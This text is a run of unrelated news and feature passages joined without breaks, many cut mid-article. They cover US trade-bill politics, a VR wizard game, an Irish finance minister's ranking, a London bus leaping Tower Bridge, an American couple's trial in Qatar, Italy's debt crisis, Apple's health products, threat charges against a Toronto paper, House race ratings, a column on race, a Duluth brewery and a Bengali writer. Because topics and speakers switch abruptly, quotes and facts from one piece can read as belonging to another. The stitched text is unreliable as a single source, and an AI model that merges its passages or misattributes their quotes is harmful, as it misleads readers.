“ Whether we can beat it in the Senate or not , I do n't know . I think we have a better shot frankly in the House where to the best of my knowledge the overwhelming majority of Democrats are against it , ” the Vermont independent said .
“ We do n't know how many tea party Republicans will not want to give the president this authority , ” said Rep. Tim Ryan , an Ohio Democrat . “ You see on some of the negotiations with Iran , they want a heavy amount of oversight they want to watch every move that he makes … if that same group applies that same standard to this trade agreement there may be some backlash with us in the House not having the ability to amend it . ”
Ryan , who represents a manufacturing-heavy district in the state 's northeast , is among those vocally opposing the bill . But he said there are still a lot of maybes out there in the caucus .
“ They 've been fairly quiet and I think they want to see how it plays out with fast track and they obviously want to see the agreement too , ” he said . “ There are a lot of unknowns out there for a Democrat to get out in front and say I 'm definitely voting for this . ”
Despite an impressive coalition aimed at defeating the deal , the number of Democrats who support the bill could grow depending on the position of leadership . But so far , there is little indication that Democratic leader Nancy Pelosi or Democratic Whip Steny Hoyer will support the legislation .
Pelosi has offered a consistent message that Democrats want a “ path to yes. ” She has even organized a series of briefings on the Asia-Pacific trade deal to help members be able to make a more educated decision , but — based on her past record — she is not expected to support a fast-track bill . She took a firm stance against last year 's TPA bill , saying it was “ unacceptable .
Hoyer , who has been supportive of past trade deals , struck an unusually cautious tone about the legislation when asked about it earlier this week .
“ It 's very controversial over here , as you well know , ” he said .
Hoyer did n't outright oppose a fast track bill last year and said he was “ keeping his powder dry ” on the issue .
The top Democrat on the House Ways and Means Committee , Rep. Sander Levin , has come out against the bill . Levin has pushed for Congress to resolve outstanding issues in the Asia-Pacific pact before voting to give the president negotiating authority .
To fast-track compromise “ gives up Congressional leverage at the exact wrong time , ” the Michigan lawmaker said in a statement . “ Instead of pressing USTR to get a better agreement or signaling to our negotiating partners that Congress will only accept a strong agreement , the Hatch-Wyden-Ryan TPA puts Congress in the back seat and greases the skids for an up-or-down vote after the fact . ”
Follow @ politico
In times of great peril , mages put their years of training and academia to the test – travelling through time to fling fire and lightning at hordes of trolls and goblins in protection of the Realm of Men . Or so The Wizards would have us believe .
Related : the PC 's best VR games .
In Carbon Studio 's VR game , you live the battle experiences of a mage , one-to-one . The trouble is , and forgive me for making assumptions about your own life , but you probably have n't trained for the hordes and the fire-flinging . Addressing that gulf between the seasoned mage and , well , you , clumsily strapped into a VR headset while bearing motion controllers , has been one of the great challenges of The Wizards ' development .
The march of VR
It 's only been three years since Oculus were tentatively sending out developer kits for what would become the Rift . But if you look at the games of Polish indie studio Carbon , you can see just how much has changed in the hardware as well as the approach of developers towards VR .
Carbon 's last effort , a science-fiction retelling of the Wonderland story named Alice VR , started development on the DK2 . The game mirrored its team 's infatuation with these new , magic goggles that allowed them to retreat into another world .
By the time they began work on The Wizards , however , VR had spread – from the head down to the waist . With the release of the HTC Vive and Oculus ' Touch motion controllers , the fantasy had changed .
“ For us it was obvious that we had to make the most of this new possibility , ” PR manager Pawel Gajda says . “ And becoming a wizard is like a childhood dream for a lot of people . ”
The Wizards reflect the key lessons Carbon learned to make Alice VR . Where their last game was built from large levels with relatively little interaction , this time they resolved to pack as much fun into one place as possible . The result is a game in which you burn villages and ruined castles as the horde charge on your location , rather than the other way around – moving towards the enemies yourself .
The game 's prototype was put together across three days during a VR jam in Hamburg last summer .
“ We barely slept , ” Blueprint scripter Daniel Kisielewski remembers . “ It was a lot of work , exhausting , but very satisfying. ” And so the work continued .
Power and motion
In the prototype , the single spell Carbon had implemented was a projectile , fired like a slingshot . Casting involved pushing down triggers on the motion controllers – but now , The Wizards is all about performing gestures with your hands .
“ Originally there were some difficulties when it comes to recognising spells , ” Kisielewski notes . “ You meant to conjure one but the other came out . But by making some slight adjustments we were able to overcome it . ”
The team have worked through their technical difficulties with the help of some choice Unreal Engine 4 plugins . But the greater problem was how to sell the wizard fantasy with one-to-one motion tracking .
“ The funny thing is that we had to make throwing fireballs at the enemies easier than in real life , ” Gajda says , raising some questions about his background .
“ If you take a stone and try to throw it at something ten or 20 metres away from you , it 's not that easy to hit it , ” he clarifies . “ But in our game , you are a master wizard . You have to have skills better than in real life . ”
Which is to say : Oculus and HTC 's motion controllers are designed to track exact gestures – but our exact gestures are often clumsy , and not at all befitting a mage at the peak of his abilities . For that reason , Carbon have introduced a very slight auto-aim that helps players hit targets from far away .
“ It 's tricky , but I believe it works quite well right now , ” Gajda says . “ We are satisfied . ”
Fireballs and frame rates
When you hold a ball of fire in your hand – a Pyroblast , as it 's called in The Wizards – you see the smokes and the sparks . You hear the crackle of flame and feel the force vibrating in your palm .
“ It was really important from the experience side to make sure sound , visual effects , and force feedback perfectly fit together and work simultaneously , ” Gajda explains . “ All together it gives you this sensation of having something that 's really powerful in your hands . ”
The challenge has been to keep the frame rate at 90 – a necessity rather than a luxury when avoiding motion sickness in VR . The team have leaned on Nvidia 's VRWorks , a suite of APIs , libraries , and optimisations designed to help developers get the most out of their headsets .
“ It helps frame rate very much , ” Kisielewski says . “ They are using their own tricks when it comes to rendering and lens matched shading . ”
Gajda points out that , when Carbon surveyed their alpha testers , they found that 70 % owned PCs with specs above Oculus ' recommended settings . It 's not the kind of study you could publish in a paper – clearly there 's an element of self-selection among players who have put themselves forward to test a VR game . But it has helped the team focus their efforts .
“ Actually , it 's a question about how players who have a GTX 1080 can make the most of the game , and not how to make sure that we meet the recommended specs , ” Gajda says .
“ I 'm proud of the spells and the fun that comes from casting them , ” Kisielewski adds . “ Even though I should be fed up with testing them , it is a power fantasy and it does empower you when you can throw fireballs . I find it very entertaining , and I 'm glad I 'm not alone . ”
The Wizards are coming to PC next month . Unreal Engine 4 is now free .
In this sponsored series , we 're looking at how game developers are taking advantage of Unreal Engine 4 to create a new generation of PC games . With thanks to Epic Games and Carbon Studio .
BRIAN LENIHAN has been named the worst finance minister in Europe for the second year running in the annual ranking of European finance ministers by the Financial Timesnewspaper .
In the fifth annual league table , the newspaper said that the problems faced by some countries proved simply too great to handle .
“ Brian Lenihan was overwhelmed by the crisis in Ireland 's banking system and the implosion of the country 's economic growth , ” said the newspaper .
Mr Lenihan , who ranked second-last in the newspaper 's 2008 survey , had been unable to restore market confidence in the banks , the newspaper said .
After taking responsibility for dud property loans and recapitalising the banks , he has “ run out of policy tools ” and the banking sector is back where it started – “ facing a funding crisis and locked out of the debt market ” , it said .
Mr Lenihan was forced to accept the €85 billion EU-led rescue package last month amid signs that the European Central Bank had reached “ the limits of its largesse in providing financial institutions with liquidity ” .
“ Mr Lenihan could argue that an objective assessment of finance ministers is impossible : the impact of decisions taken now might not be seen for years ; some events are beyond their control ; economists fight over what is the best response to crises . But since when have talent shows been fair ? ” the newspaper said .
Out of 19 ministers assessed – some of the smaller countries were excluded – Germany 's Wolfgang Schäuble ranked best , owing to the strength of his economy .
UK chancellor George Osborne , who introduced a severe budget within weeks of taking office , took sixth position .
George Papaconstantinou of Greece – which along with Ireland is the only country to have been bailed out by the EU and IMF – came eighth , but was judged to have the best political skills after displaying “ panache ” in his handling of the country 's economic crisis .
The ministers were ranked by leading economists based on political ability , economic performance and credibility in the markets .
The Jumping Bus
Many a motorist has lived through the experience and awakened in his bed to find it was only a bad dream . Last week London Bus Driver Albert Gunter , 46 , knew that it was no dream . With 20 passengers in his double-decker bus , Albert was just starting across the draw in London 's Tower Bridge , as he had hundreds of times before . Suddenly , he said later , `` it seemed as though the roadway in front of me was falling away . '' Albert started to jam on his brakes . Then he changed his mind .
`` Everything happened terribly quickly , '' he said . `` I realized that the part we were on was rising . It was horrifying . I felt we had to keep on or we might be flung into the river . So I accelerated . '' Up and up slowly went the bridge span ; on and on Albert drove his bus . At the end of the span , Albert , his conductor and all 20 passengers soared off into space , leaped the widening gap and landed with a horrendous thump on the southern span six feet below . `` I thought that might start going up too , '' said Albert , `` so I just kept right on till I got to the other bank . ''
Results : a broken spring for the bus ; a broken leg for the conductor ; minor injuries for twelve passengers ; a £10 ( $ 28 ) bonus to Albert for his quick thinking .
An American couple of Asian descent who were tried for murder in Qatar after the accidental death of their Ghana-born adopted daughter have revealed the accusations against them were based almost entirely on racism .
Matthew and Grace Huang were initially convicted in the death of eight-year-old Gloria , who was found dead from malnutrition in their Doha home in early 2014 but it was later quashed .
Now living back in the U.S. , the deeply religious Huangs say their races - and that of their African children - nearly got them executed in the tiny Arab oil state .
Held in Qatar : Matthew and Grace Huang were initially convicted in the death of eight-year-old Gloria ( center left ) , who was found dead from malnutrition in their Doha home in early 2014
Matthew and Gloria Huang moved to Qatar after Matt 's company , MWH Global , asked them to relocate there in 2012 to work on an infrastructure project related to the 2022 World Cup .
The Huangs told New York Magazine in a recent interview that the racist questioning began just after he rushed his daughter to a Doha hospital , where she was pronounced dead .
The Huangs were arrested in January 2013 after an autopsy found their eight-year-old daughter , Gloria , died of dehydration and cachexia , an irreversible loss of body mass . The couple said Gloria suffered from malnutrition-related diseases since they adopted her from Ghana at age 4 .
'The first question was : `` Who is she ? '' '' She 's my daughter . '' ' recalled Grace , who said the interrogators refused to believe she was American because she and her husband are of Asian descent .
'They said , 'How did she die ? ' ' Matt recalled . 'They asked me that ten , 15 times . '
Shocking suggestions : The Huangs say Qatari officials refused to believe they 'd choose to raise African children and instead suggested the couple wanted the children for their organs
Ezra and Jesse arrive at LAX with their grandmother after returning from Qatar where their parents were imprisoned
A month later , an investigator testified that the Huangs had adopted Gloria , along with her two adopted brothers 'most likely to either sell their organs or to conduct medical experiments on them . '
The investigator openly based his conclusion on the races of the Huangs and their kids , saying :
'The adoption process consists of searching for children who are good-looking and well-behaved , ' he said , 'and who have hereditary features that are similar to those of the parents . But the children connected to this incident are all from Africa , and most of the families there are indigent . '
Matthew and Grace Huang had initially been charged with murder and were convicted of lesser child-endangerment charges last year in connection with Gloria 's death , according to a support website for the family .
Those convictions were later thrown out by an appeals court .
The prolonged legal battle and months of separation from their boys following the death of their daughter took a serious toll on the Huangs , who are now living a very private life in rural Washington State .
Matthew no longer works for MWH and is still looking for work .
' I had a lot of dreams and hopes once , ' he says , 'and now I 'm in a phase where frankly I do n't know the future . '
The Huangs are now suing MWH on claims the company relocated them to Qatar without warning them of hostility they could face as an interracial family living in the tiny Gulf Arab state .
However , no case will bring back their daughter , whose cause of death to this day is n't totally clear .
' I had to get to the point where I trusted that God is in charge , ' Matt told NYMag .
Lost everything : Now free and living back in the U.S. , the Huangs say they lost everything following their legal drama
U.S . Ambassador to Qatar , Dana Shell Smith , escorts the Huangs and their adviser Eric Volz to the airplane in December after their acquitta
When they were released from prison , the Huangs took over precaution not to be noticed while out in public , as they were barred from leaving Qatar
The pair is pictured smiling on their return flight to Los Angeles where they will be reunited with their sons
“ Italy is too big to fail , ” said Moisés Naím , a senior associate in the international economics program at the Carnegie Endowment in Washington . “ If Italy really gets hit by contagion because of political mismanagement , it would be a threat not only to the euro zone , but to the global economy . ”
Political soap operas in Italy — especially those featuring Mr. Berlusconi — are nothing new . Nor do they usually matter much to financial markets , even after the debt crisis hit Europe . The widespread problems in Italy 's economy , which has been sluggish for the better part of a decade , also rang few alarm bells .
What 's more , Italy 's banks are sound ; they never speculated in a housing bubble . The current annual budget deficit is low , at about 4.6 percent of gross domestic product . And while Italy issues the largest amount of bonds of any euro zone country , Italians own about half the debt , making it less vulnerable to the follies of financial markets .
But with interest rates rising , Italy 's economy is not growing fast enough to cover an accumulated debt load of 120 percent of gross domestic product , the second-highest in Europe , after Greece . The International Monetary Fund expects growth to pick up only slightly , to 1.3 percent in 2012 .
Photo
In a sign of how quickly things have turned against the country , the stock market regulator imposed emergency rules on Monday against speculation after shares in Italian banks slumped for a fifth consecutive session . The cost of insuring Italy 's sovereign debt against default surged to a record high , and the interest on its 10-year bond leaped to a record 5.67 percent .
While that is still well below what Greece pays , analysts say Italy will have serious problems if its borrowing costs exceed 6 percent .
“ Italy is a banana republic that did n't depend so much on foreign capital in the past , but now it does , and markets are less forgiving , ” said Daniel Gros , the director of the Center for European Policy Studies in Brussels . “ Italy is in the danger zone ; that is quite clear now . ”
Advertisement Continue reading the main story
Italy tends to function best in crisis management mode , analysts say , and Mr. Berlusconi has begun to acknowledge the seriousness of the dangers facing the country after a phone conversation with the German chancellor , Angela Merkel , on Sunday .
Today , Mr. Berlusconi “ understands the risks objectively because the situation is dramatic , ” said Stefano Folli , the chief political columnist for the financial daily Il Sole 24 Ore .
Mr. Folli and other analysts predicted that the Italian Parliament would rally and pass a 40 billion euro ( $ 56 billion ) austerity package that Mr. Tremonti had championed — even if it turns out to be one of the last significant acts of a government running out of political capital .
Newsletter Sign Up Continue reading the main story Please verify you 're not a robot by clicking the box . Invalid email address . Please re-enter . You must select a newsletter to subscribe to . Sign Up You will receive emails containing news content , updates and promotions from The New York Times . You may opt out at any time . You agree to receive occasional updates and special offers for The New York Times 's products and services . Thank you for subscribing . An error has occurred . Please try again later . View all New York Times newsletters .
Last week , Mr. Berlusconi prompted a sell-off in Italian bonds by suggesting that Mr. Tremonti , a longtime political rival and the sole guardian of fiscal prudence in Italy , could be elbowed out of government , imperiling the austerity package , the details of which still remain shrouded in confusion .
“ He thinks he 's a genius and everyone else is stupid , ” Mr. Berlusconi said of Mr. Tremonti in an interview published on Friday in La Repubblica , the center-left daily . “ He is the only minister who is not a team player , ” he added .
At the same time , Mr. Tremonti has other problems . Naples prosecutors are seeking the arrest of one of his close advisers , Marco Milanese , a member of Parliament who has been accused of accepting jewelry , cars and other luxury items from an Italian businessman .
Until the accusations were made public , Mr. Tremonti had been staying in an apartment owned by Mr. Milanese . He moved out soon after they surfaced .
Video
Even if Parliament approves the austerity measures in the coming weeks , the scandal around Mr. Tremonti could grow .
“ I do n't think he can withstand this scandal — it 's becoming unsustainable , ” said Massimo Giannini , the business editor and deputy editor of La Repubblica . “ He has too many enemies inside the government . ”
Advertisement Continue reading the main story
In Brussels on Monday , Mrs. Merkel said : “ I have firm confidence in the Italian government to approve exactly such a budget — I spoke on the telephone with the Italian prime minister yesterday on precisely this issue — and to signal that Italy feels a duty to consolidation and fighting debt . ”
“ The euro itself is stable , ” she added , “ but we have a problem in some countries . ”
For Italy , the biggest worry right now is that its fate may rest as much in Athens , Brussels and Berlin as it does in Rome . Only a week ago , it looked as if Greece might be turning a corner on its problems , after the government managed to push through an austerity package and French and German banks worked on ways to help Greece avoid default .
But the plan by banks fell apart over the weekend , and policymakers are at an impasse on how to require contributions from private creditors as part of a second Greek bailout .
“ Markets were getting more optimistic , and suddenly they 're saying , ‘ My God , this is as bad as it ever was , ' ” said Peter Westaway , the chief European economist at Nomura International and a former Bank of England official . “ Now , it looks as if Italy and Spain are going to be involved , too . And that makes the problem an order of magnitude more complicated for policymakers . ”
Mr. Westaway cautioned against getting too negative about Italy . For one thing , the austerity being sought is nowhere near as crushing as what Greece is having to take on .
Still , if the crisis were to take hold in Italy , the problems for the euro union would dwarf all others to date . European banks have total claims and potential exposures of $ 998.7 billion to Italy , more than six times the $ 162.4 billion exposure they have to Greece , according to Barclays Capital . European banks have $ 774 billion of exposure to Spain and $ 532 billion of exposure to Ireland .
In the United States , banks are also more exposed to Italy than to any other euro zone country , to the tune of $ 269 billion , according to Barclays . American banks ' next biggest exposure is to Spain , with total claims estimated at $ 179 billion .
But at the end of the day , “ If Italy goes , it 's no longer a domino , ” said Mr. Gros , the analyst in Brussels . “ It 's a brick . ”
Over the past few decades , Apple has revolutionized the personal computer , the smartphone , and digital music , just to name a few . But the company 's next target might be its biggest yet : human health .
That should hardly be a surprise at this point . Those who have been paying attention have seen Apple heading in this direction since before Tim Cook took over as CEO . Probably , not coincidentally , since around the time that Steve Jobs was first diagnosed with the illness that eventually took his life .
Mortality confronts us all at some point . But , to paraphrase the old expression , nobody ever does anything about it . Apple , however , is using its broad expertise in a number of realms to push forward its health agenda .
Apple Watch and HealthKit
The most obvious evidence of Apple 's push for a healthy lifestyle has come from its products , especially the Apple Watch . Health and fitness have been cornerstones of the watch since its incarnation and , I would argue , have also been its most successful applications . With features from those Activity rings to workout tracking to heart-rate monitoring , the Apple Watch seems positioned as almost a Trojan horse to get health into the lives of technophiles . ( I 've lost track of the number of friends with Apple Watches who have seized upon closing those rings every day as a personal challenge . )
But the Apple Watch does n't exist in a vacuum . Apple 's Health app on iOS and the HealthKit framework that support it provide a central clearinghouse for health-related data , which other apps and accessories can access and used to provide us more insight about how we 're living our lives . This in turn can help us make better decisions about our health . And that does n't even dip into the work Apple is doing to try and bolster health studies with the development of ResearchKit .
Over the last couple years , Apple has made health an integral part of its ecosystem for consumers , and by doing so has not only appealed to those who were already fitness conscious , but also to those who probably gave it little thought before . Apple 's taken a similar tack before : Time Machine for backing up your data comes to mind . As with Time Machine , the Apple Watch took a behavior we all knew we should do—backing up our computers , exercising more—and cut through the confusion and frustration to make it happen .
What comes next ?
Nor does the company look to be stopping its health foray anytime soon . If anything , it 's intensifying its focus , if two recent developments are any indication .
The first was a series of rumors about the company developing a way to monitor glucose levels in order to help diabetics manage their blood sugar levels . This is traditionally very difficult , if not impossible , to do in a non-invasive way , but reports claim that Apple has been at work on a method for years . Accuracy and reliability are essential , as people 's lives depend on it , but if the technology proves feasible it could truly change the lives of many folks with diabetes , and open the door to other types of monitoring , like blood oxygen levels .
Also , Apple acquired Beddit , a company that makes a monitoring device that slips under your sheets and tracks how soundly you sleep . It 's been rumored that sleep-tracking could be a major feature of an upcoming watchOS 4 , though it also seems that a Beddit-like accessory could be more useful , both in terms of how its sensors actually measure your sleep and in terms of practicality : wearing your Apple Watch all night while having it track your sleep is a good way to run down the battery .
Tim Cook 's influence
While Apple 's health-tracking initiatives might have started in the era of the late Steve Jobs , it 's impossible to overstate the importance of the company 's current CEO . Three years ago I suggested that Apple 's health push—then rumored to be called Healthbook—could be the first real product of Tim Cook 's Apple . That 's because , by all accounts , health and fitness seem to be as much a passion for Cook as music was for Jobs .
And though a company as large as Apple is bigger than the proclivities of any one person , the person at the helm sets the direction . For Cook , that seems to be about health , generally , and also specifically about integrating it in a way that meshes with Apple 's mission of providing technology that not only delights users , but makes the world a better place .
In contrast to Google , which at one point stated an avowed goal to solve death , Apple does n't seem to aspire to megalomaniacal ends . Instead , the company is focused on helping us make the most of the time that we do have by living healthy , active lives . And if that helps us keep going longer , well , that 's just a side benefit .
Two men behind a controversial newspaper that 's been banned from being delivered by Canada Post are now facing criminal charges for words the editor-in-chief wrote about political strategists Warren and Lisa Kinsella .
An Ontario Justice of the Peace has charged Your Ward News editor James Sears and owner Leroy St.Germaine with uttering threats . The Kinsellas have long fought the newspaper they call a `` hate-rag '' and this is the first criminal charge they 've had stick .
Sears has called his writing `` satirical . '' He penned the following sentence in this summer 's online edition of Your Ward News : `` ... there was the chance that some hothead who cares deeply about me and my family , would lose it and do something illegal , like bludgeon the Kinsella 's to death . ''
Rather than satire , the Kinsellas saw it as a threat to incite violence against them .
Lisa Kinsella says although the paper is no longer being distributed by Canada Post , it 's still published online and worries their readership is growing . ( CBC )
`` We took it as the threat that it is . Designed to intimidate us because we have been so outspoken about Your Ward News , '' said Lisa Kinsella , who calls the Toronto-based paper a 'hate rag . ''
`` This was a threat designed to shut us up and it wo n't work . ''
In an email to CBC Toronto , Sears called their case an , `` Impotent complaint laid in desperation by [ these ] publicity whores . '' Sears continued to defend himself by saying his words were taken out of context .
Sears and his co-accused and owner of the newspaper , Leroy St.Gemaine , will be summoned to court at a later date to respond to the charge of uttering threats . Sears suggested that the courts today are lacking both sides of the story .
`` My legal team and I will mop the floor with the Kinsellas on our first available opportunity in court , '' he said .
Your Ward News has been accused of publishing stories that demean women and insult the LGBT community . ( Your Ward News )
Delivery ban
In the 10 years Your Ward News has been around , residents who have had it delivered to their doors have complained , calling it racist , homophobic , anti-Semitic , sexist and all-round hateful . Some mail carriers protested having to deliver it .
Last year , the minister responsible for Canada Post , Judy Foote , issued what 's known as a prohibitory order against the future delivery of the paper . It is still accessible online .
The ban has been under review since Sears and his council filed an appeal in late April . The Ward News defence is free speech . The Kinsellas will argue that they have experienced harm with its distribution .
Cook Political Report , a top nonpartisan election handicapper , released new ratings changes on Friday for 12 House districts , with all but one shifting in favor of Democrats a year ahead of the 2018 midterms .
The newsletter highlighted that President Trump and the Republican majorities in Congress have generated a candidate boom for House Democrats , noting that many of them are political newcomers — a class that recalls the GOP 's candidates during the 2010 cycle .
Some of the most notable ratings changes include the shift of three House districts — GOP Reps. Dana Rohrabacher ( Calif. ) , Martha McSally ( Ariz. ) and Rod Blum ( Iowa ) — from Lean Republican to toss-up .
ADVERTISEMENT
In California , Rohrabacher has been in Congress for nearly three decades , but The Cook Political Report pointed to his pro-Russia stance and his district 's shifting demographics as potentially tough obstacles for him next year . A crowded Democratic field is also shaping up to unseat him , and Clinton won the district by about 2 points .
Meanwhile , in Iowa , Blum has always been a top target for House Democrats , but President Trump was able to carry his district by 3 points . But the handicappers noted the district 's left-leaning nature and also highlighted his potential Democratic opponent , state Rep. Abby Finkenauer , who is 28 and would be the youngest woman ever elected to Congress .
Other notable changes are the shift from Likely Republican to Lean Republican in Rep. Mike Bishop 's ( R-Mich. ) seat and Rep. Pat Meehan 's ( R-Penn . ) seat . Rep. Lynn Jenkins 's ( R-Kan. ) open seat was also moved to Lean Republican .
While these seats are still considered safer seats for Republicans to hold , a handful of others became slightly more favorable for Democrats including the districts of GOP Reps. Duncan Hunter ( Calif. ) , Mia Love ( Utah ) , Andy Barr Garland ( Andy ) Hale BarrSchumer urging ex-congressional candidate Amy McGrath to run against McConnell House Dems unveil initial GOP targets in 2020 Poll shows 25 percent view McConnell favorably , lowest among leaders in survey MORE ( Ky. ) , Dave Brat ( Va. ) and Dan Donovan ( N.Y. ) .
Only one ratings change favored Republicans : Rep. Kyrsten Sinema 's ( D-Ariz. ) open seat . The newsletter shifted it from Solid Democrat to Likely Democrat . Cinema is giving up the seat to run against vulnerable GOP Sen. Jeff Flake Jeffrey ( Jeff ) Lane FlakeBrexit and exit : A transatlantic comparison Poll : 33 % of Kentucky voters approve of McConnell Trump suggests Heller lost reelection bid because he was 'hostile ' during 2016 presidential campaign MORE next year .
The ratings changes are good news for Democrats who will need to win 24 seats next year in order to take back control of the House , a tall order even if the political environment proves favorable .
by
The Deseret News just published a column by Ralph Hancock , a Harvard-trained BYU professor of political science . Hancock suggests black people in America would be better off if they could learn to see the world through his white male eyes . “ Black stories matter , ” the headline says , and the substance of the piece is that the biggest problems facing black people are ultimately their own fault , or at least the solution to their problems are chiefly in their hands .
I was surprised to see Hancock say we should judge stories largely according to their “ practical effects. ” How well do our stories help us accomplish the things we want ? If black people have problems , they must consider the fact that their stories are at fault . Those stories include things like the fact that racism still walks the streets , that by virtue of the color of their skin they are more often burdened with greater risks and fewer opportunities than others . We gave you the Civil Rights Act , Hancock says in effect , the rest is on you . America opened the doors of the cage but black people stubbornly shut themselves back in again . The legal and sometimes extra-legal actions they take to address those problems ( why are they blocking streets ? That does n't seem like a civil thing to do ) will fail because they are rooted in the wrong story .
Hancock 's solution is for black people to think like he thinks , to absorb his story :
“ If I am a young black person who believes that America , despite its flaws and its checkered past , is on the whole a just society where talent , effort and the content of one 's character are honored and rewarded , regardless of race , then it makes sense to build my personal story as an effort to play by the rules and to have some confidence in the goodwill of my white fellow citizens . If this is my story , then I will see both my failures and my successes as mainly my own responsibility . ”
This can come across like this : “ if I was a black person who saw the world like a white person , I would agree with me . ”
Hancock seems bothered when black Americans express cynicism about the American dream which says if you “ play by the rules ” you 'll receive your just desserts , regardless of all other variables . He asks : Which of the big stories about America makes for a healthier soul and society ? I suggest it 's the story that does n't assume that the fallout from centuries of systemic racism , exploitation , violence , and degradation , was all erased during one decade of the twentieth century , as important and remarkable as that decade was .
I agree with Hancock especially on one point . Our American ideals and the stories we tell about them do matter . And Hancock gestures toward a crucial point with this caveat : “ Every story is of course an approximation ; no story can be conclusively proved by any set of facts. ” At the same time , he seems to invite us to accept a story that requires the least from him , from me , and it 's a story that requires the most from those who are hurting the most right now .
The Deseret News also published a piece by Richard Davis today , also a BYU professor of political science . It 's hard not to read it as one among several possible rebuttals of Hancock :
“ Some may blame all of these problems on African-Americans themselves . That attitude ignores the history of discrimination that has led up to today . An inability to recognize the roots of our difficulties is one of the biggest challenges Americans face today with race relations . It is not surprising that many African-Americans are angry about how they have been treated and how they are still treated today . ”
Of course , the common denominator between Hancock , Davis , and myself is that we 're all white males . If we 're going to say black stories matter , maybe we could actually start listening to them much more than any of us already have , rather than offering our own stories as preferable replacements . Where can we start ?
*
* P.S.—I recently spoke with Julius Bailey about the history of African American religion . It was a fascinating discussion that helps complicate the simplistic narrative of America simply being a land of opportunity , home of the free . It 's more complex than that , as things usually are . You can listen to the interview HERE , or read the transcript HERE .
She had been talking about the one prevailing idea when it came to the look of the cans and marketing materials for the start-up : “ Wood meets metal . ”
She turned in her chair and looked longingly through a garage door to the stainless steel tanks just 20 yards away .
“ Look how beautiful that brewery is , ” she said .
It 's a pride that obviously has been contagious among the other three owners of the brewery and the beer drinkers who have taken to Bent Paddle beers .
Mullen sat with fellow owner Karen Tonnis to talk about the process that led to the design of its four flagship beer cans and the emerging Trail Series versions . The two women are married to the other owners of the brewery , longtime brewers Colin Mullen and Bryon Tonnis .
“ They brought it home for us , ” Tonnis said of working with Duluth marketing agency Swim Creative .
The Bent team had about 50 designs in mind and were “ stuck forever ” on deciding which ones to pick before the brewery opened last year .
Swim helped mediate the ideas flying among the owners , Mullen said .
“ Outdoorsy but not northwoodsy , ” Tonnis said . Classic but “ cutting edge ” with a real “ sense of where the beer comes from . ”
They talked about whom a typical customer might be , what kind of car they might drive , what 's on their iPod , what kind of shoes they wear , Mullen said .
They also wanted to project their expertise in beer making . The Swim team asked , “ Why was this business created ? ” The answer : “ To share good beer . … We love brewing it , we love drinking it and , most importantly , we love watching other people drink it . ”
Eventually , the four owners joined the Swim designers for what Tonnis called a “ lock-in day. ” They would meet and not leave the room until they decided on the look . “ It was annoying , but in a good way , ” Mullen said .
The colors and copy came to life . Tonnis remembers the excitement when it all came together . “ It was ‘ Yes . Yes . ' ”
With the designs in hand , the rest of the marketing for the beers flowed .
“ The scheme became real , ” Mullen said .
“ It helped us kick off a full branding portfolio , ” Tonnis said . Table tents , posters , shirts and other merchandise followed . “ It 's so put together . ”
So much so , they said , that casual observers sometimes think the Bent Paddle brand has been around longer than just a year and a few months .
The distinctive design was put into merchandise and materials for display at stores and bars . Soon after opening , people started saying , “ You 're everywhere , ” Tonnis said .
The flagship designs came with serious deliberation because they will be around for a long time . Now , as seasonal beers are being introduced , like the Trail Series , the design of the cans can be more “ playful , ” Mullen said .
The yellow Paddle Break Blonde has attracted rave reviews from the craft brew industry for its bold , throwback design . A Daypack Pale Ale comes out this month .
The series designs , featuring a lakes map and figures portaging and hiking , bring out all the things the Bent Paddle owners love about the Northland , Mullen said .
“ I think people like knowing where something came from , ” she said .
Tonnis said the company is lapping up all the love it 's received from Duluth and the region . They are years ahead in their business growth plan and are expected this year to brew nearly three times the volume they predicted in that plan .
“ We 're most surprised by the volume of beer Duluth goes through , ” Tonnis said .
The two women said the business growth is controlled and all four are finding a life balance . Each couple has a 2-year-old child and “ family ” is part of the Bent Paddle culture , Tonnis said .
“ My life is fun , ” she said . “ It 's social . ”
“ The beer world is friendly , ” Mullen said .
Part of that camaraderie is reflected in the can designs , they said , which have helped cement the relationship with customers .
“ There was a kismet to all this , ” Mullen said .
in a shabby , refugee-dominated corner of Kolkata 's southern fringe , writer Manoranjan Byapari struggles to sit cross-legged on the bed in his two-room home . His knees hurt from years of plying a rickshaw and , it emerges from our conversation , the residual pain from the time Communist Party of India ( Marxist ) cadres tried to break his kneecaps back in the 1970s .
Byapari was an “ active '' Naxalite in those bloody , turbulent days of Kolkata 's history , at odds with the CPM and its power structures . A teenaged refugee from East Pakistan ( now Bangladesh ) , Byapari “ escaped '' the destitution of his shanty in Kolkata and headed to north Bengal 's Siliguri . The agrarian revolt that flared up in nearby Naxalbari in 1967 drew Byapari like a moth to the Naxalite movement 's egalitarian dream . “ We were trained in handling pipeguns and minor weapons . Our enemies were small industrialists and businessmen , '' he says of the time when he returned to Kolkata in 1970 . “ One day , a childhood friend , who was a CPM worker , was killed by Naxals . I saw his body and became disillusioned . Instead of reaching the capitalists , we were killing our own poor people and home guards , '' he says . The Naxalite phase of his life found gripping literary form in his 2013 novel Batashe Baruder Gondho .
Naxal leaders Charu Majumdar ( left ) and Kanu Sanyal . Photo : Hindustan Times
Byapari , 66 , is finally comfortable on the bed . The thinly whitewashed walls are marked by misshapen stains of water seepage ; a fan hanging from the asbestos-lined ceiling whirrs slowly , doing little to dissipate the late-evening heat . Stacks of books line two shelves , one dedicated to his own books . Byapari lives with his wife and son Manik , named after writer Manik Bandopadhyay , one of his literary heroes .
Since 1981 , Byapari has authored a dozen novels and over a hundred short stories , apart from non-fiction essays . One of the books on the shelf is the second volume of The Oxford India Anthology Of Bengali Literature ; while Rabindranath Tagore is the first entry , Byapari features as the penultimate entry in Vol . 2 in the compendium of Bengali literature 's elite . “ While being a writer in Bengal has been socially edifying , financially I continue to be in the doldrums , '' says Byapari .
Byapari was first published in Mahasweta Devi 's journal ‘ Bartika ' . Photo : Hindustan Times
Golpo Somogro , a collection of 22 short stories , was published this September by Kolkata-based publishers Boiwala , even as Itibritte Chandal Jiban , the autobiographical novel that won him the coveted West Bengal Sahitya Akademi Award , is cited as an exemplary illustration of Bengal 's Dalit and working-class life . “ The author of Itibritte Chandal Jiban is an amazing discovery for me , '' writer-activist Mahasweta Devi had written in a collection of scholarly writing on Byapari published this March , titled Nana Chokhye Manoranjan Byapari . “ Manoranjan is not merely a ‘ Dalit ' writer . He is an icon of another generation—alive , dissenting , and a symbol of hope and aspiration of ordinary people , '' says Mahasweta Devi in the preface .
